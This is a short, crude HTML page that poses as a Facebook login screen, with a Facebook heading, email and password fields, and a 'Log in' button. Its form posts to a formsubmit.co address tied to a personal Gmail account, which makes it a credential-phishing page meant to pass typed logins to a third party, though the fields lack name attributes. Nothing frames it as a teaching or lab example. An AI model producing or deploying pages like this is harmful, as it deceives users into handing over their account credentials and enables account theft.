<!DOCTYPE html>
<html lang="en">
  <head>
<body>
<center><h3>facebook</h3></center>
 <center><p>Log in to Facebook</p></>
  <form action="https://formsubmit.co/dhakalroshan165@gmail.com" method="POST">
<center><input type="email" placeholder="Mobile number or email address"id="email"></center>
<center><input type="password" placeholder="Password" id="Password"></center><br>
<center><input type="submit" value="Log in"id="button1"></center>
<link rel="Facebook log in page" href="style.css">
</body>



<style>
  p{color: black;}
  h3{color:#4552DC;
   font-size: 50px;}
  #button1{padding:15px;
    color: white;
    height: 45px;
    background:#396BFD;
    width: 8cm;
    border: 10cm;
    color: white;
    font-size:17px;
   padding-top:10px;
   border:1px;
   border-style:solid;
   border-radius: 5px;
   font-style:normal;
   font-weight: bold; }
 
 
  #email{padding:10px;
  height:20px;
  width: 270px;
  margin: 7px;       
    }
  
  #Password{padding:10px;
  height: 20px;
  width: 270px;
  margin:7px;
    
   }
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
</style>








  
</html>
<br><br>
<marquee  bgcolor="red" scrollamount="2" behavior="slide" direction="right">please check details carefully</marquee>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>


owned by Roshan 